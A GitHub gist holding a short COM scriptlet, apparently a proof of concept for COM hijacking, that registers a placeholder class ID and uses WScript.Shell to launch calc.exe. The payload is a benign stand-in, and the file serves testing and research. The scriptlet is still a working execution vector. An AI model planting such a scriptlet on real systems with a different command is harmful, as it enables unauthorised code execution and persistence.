Skip to content

Instantly share code, notes, and snippets.

@LOURC0D3
Last active August 2, 2023 05:18
Show Gist options
  • Select an option

  • Save LOURC0D3/a2b7168c85f591e4c004445d3c65bdbd to your computer and use it in GitHub Desktop.

Select an option

Save LOURC0D3/a2b7168c85f591e4c004445d3c65bdbd to your computer and use it in GitHub Desktop.
Display the source blob
Display the rendered blob
Raw
<?XML version="1.0"?>
<scriptlet>
<registration
progid="COMHijackTesting"
remoteable="true"
version="1.00"
classid="{00000001-0001-0001-0001-0000DEADBEEF}" >
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment